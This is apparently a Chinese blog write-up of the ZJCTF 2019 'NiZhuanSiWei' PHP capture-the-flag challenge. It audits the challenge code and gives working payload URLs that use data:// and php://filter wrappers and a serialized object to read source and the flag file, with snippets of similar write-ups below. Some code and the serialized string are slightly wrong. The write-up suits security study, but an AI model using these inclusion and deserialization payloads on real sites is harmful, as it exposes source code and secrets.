ctf (NiZhuanSiWei)

已于 2022-06-27 12:47:38 修改
阅读量337 收藏
点赞数
文章标签: php
于 2022-06-27 11:32:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Glacier_Mount/article/details/125480372
版权

第一层绕过

知识储备

isset() 函数用于检测变量是否已设置并且非 NULL。

如果已经使用 unset() 释放了一个变量之后,再通过 isset() 判断将返回 FALSE。

file_get_contents() 函数把整个文件读入一个字符串中

preg_match 函数用于执行一个正则表达式匹配。

语法

int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] )

搜索 subject 与 pattern 给定的正则表达式的一个匹配。

data://伪协议

数据流封装器,和php://相似都是利用了流的概念,将原本的include的文件流重定向到了用户可控制的输入流中,简单来说就是执行文件的包含方法包含了你的输入流,通过你输入payload来实现目的。

代码审计

<?php  
$text $_GET["text"];
$file $_GET["file"];
$password $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

这要求我们上传一个text文件内容为welcome to the zjctf

1.使用data://伪协议

?text=data://text/plain,welcome to the zjctf

为防止被过滤我们将内容转换成base64

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

第二层绕过

知识储备

include叫做文件包含命令,用来引入对应的文件

php://filter用于读取源码

php://filter参数详解

参数                                                                        描述

resource=<要过滤的数据流>

必须项。它指定了你要筛选过滤的数据流。

read=<读链的过滤器>

该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔

write=<写链的筛选列表>

该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔

<; 两个链的过滤器>

任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。

代码审计

include($file);  //useless.php

发现一个useless.php对其内容进行读取

file=php://filter/read=convert.base64-encode/resource=useless.php

                                                       ? text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php


对内容进行base64解码后得到

第三层绕过

知识储备

serialize()方法功能:将表单内容序列化成一个字符串。

代码审计

 include($file);  //useless.php
        $password unserialize($password);
        echo $password;

我们发现password进行了反序列化那我们要事先对useless.php内容内容进行序列化

<?php  

class Flag{  //flag.php  

    public $file=flag.php;  

    public function __tostring(){  

        if(isset($this->file)){  

            echo file_get_contents($this->file);

            echo "<br>";

        return ("U R SO CLOSE !///COME ON PLZ");

        }  

    }  

}  

$a=new Flag();

echo serialize($a);

?>  

O:4:"Flag":1:{s:4:"file";s:7:"flagphp";}

?    text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:7:"flagphp";}

<!--?php

if(2===3){  

return ("NSSCTF{9b2e5d34-7ffa-4015-9eb5-c9e4561e5d65}");

}

?-->

Glacier_Mount
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTF系列】攻防世界-nizhuansiwei
读万卷书,行万里路。
03-02 520
文章目录1 file_get_content2 include3 反序列化 相关信息: hint:无 进入网站后,便能显示源码,是一道代码审计题目。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; // text 需要等于 welcome if(isset($text)&&(file_get_contents($text,'r')==="welcome to
BUUCTF-NiZhuanSiWei
m0_47571887的博客
11-08 1091
打开题目 第一个if是让我们提交text值,text不为空,并且file_open_concents的返回值为'welcometothezjctf',但这text是个变量,这里就需要用到php://input协议,以POST方式提交'welcometothezjctf'。 第二个if是过滤了flag,如果检测flag,则返回"Not now",这里还发现了一个文件包含。 先将useless.php拖拽下来。 ?text=php://input&file=php://fil...
[ZJCTF 2019]NiZhuanSiWei
brainw的博客
04-22 2594
[ZJCTF 2019]NiZhuanSiWei 代码审计 查看一下useless.php --只有注释信息 没有用 利用data协议绕过 将welcome to the zjctf写入 而data://协议允许读入 payload: text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 到这里就不会了 只有看下wp了 正则判断...
CTF工具合集
04-09
CTF工具合集包括了CTF相关的各种工具,包括逆向,解密,WEB,密码学等等,相当有用,可以方便地准备各种CTF比赛
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
ctf拼图例题-puzzle
04-13
关于puzzle例题的原题资源,搭配文章使用更配噢 https://editor.csdn.net/md/?articleId=124139016
ctf 密码工具
07-30
ctf 密码类工具 各种加密解密都支持 编码转换 古典密码
[ZJCTF 2019]NiZhuanSiWei【超详细讲解】
wo41ge的博客
11-15 3876
进入题目链接 这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>
buuctf [ZJCTF 2019]NiZhuanSiWei
SopRomeo的博客
03-15 1214
给了一段源码,注释如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ //判断$text变量是否...
web-[ZJCTF 2019]NiZhuanSiWei
wojiushilsy的博客
05-15 311
题目要点题目内容解题第一个绕过:第二个绕过第三个绕过 题目要点 php伪协议 data://text/plain,编码(base64),内容 php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。 resource=<要过滤的数据流> 这个参数是必须的。它.
NiZhuanSiWei(php伪协议)
m0_52138890的博客
09-13 453
NiZhuanSiWei 看代码,有三个参数,即text,file,password。看满足条件: text不为空,且 file_get_contents() 读取的返回值为 welcome to the zjctf,file_get_contents()函数的功能是读取文件内容到一个字符串,但这里没有一个文件,而是读取的text变量。直接给text赋值 text=welcome to the zjctf 的话,没有回显说明没成功。很明显,需要用伪协议绕过,可以用php://input和data:/
CTF-include
qq_61774705的博客
08-16 1878
ctf
ctf include(文件包含漏洞)
weixin_64311421的博客
03-01 1057
不能不知道ctf比赛中的文件包含漏洞的题
CTF reverse
最新发布
12-25
CTF reverse(CTF逆向工程)是指在CTF竞赛中涉及到的逆向分析和破解技术。逆向工程是通过对软件进行反汇编、反编译等操作,来理解其内部结构和实现原理的过程。在CTF reverse中,参赛选手需要具备较强的逆向分析能力,能够通过逆向分析来猜测软件的功能和实现思路,并进行验证。 CTF reverse的主要目标是解决给定的逆向工程问题,例如破解密码、还原加密算法、分析恶意软件等。参赛选手需要使用逆向工程技术来分析和理解给定的程序或者二进制文件,找出其中隐藏的信息和漏洞,并利用这些信息来解决问题。 在CTF reverse中,常用的工具包括IDA Pro、OllyDbg、Ghidra等。参赛选手可以使用这些工具来进行反汇编、反编译、调试等操作,以便深入理解程序的运行机制和逻辑。 总结起来,CTF reverse是一项需要逆向分析能力的竞赛项目,参赛选手通过对软件进行逆向工程来解决给定的问题。这需要他们具备扎实的逆向分析技术和对计算机系统的深入理解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值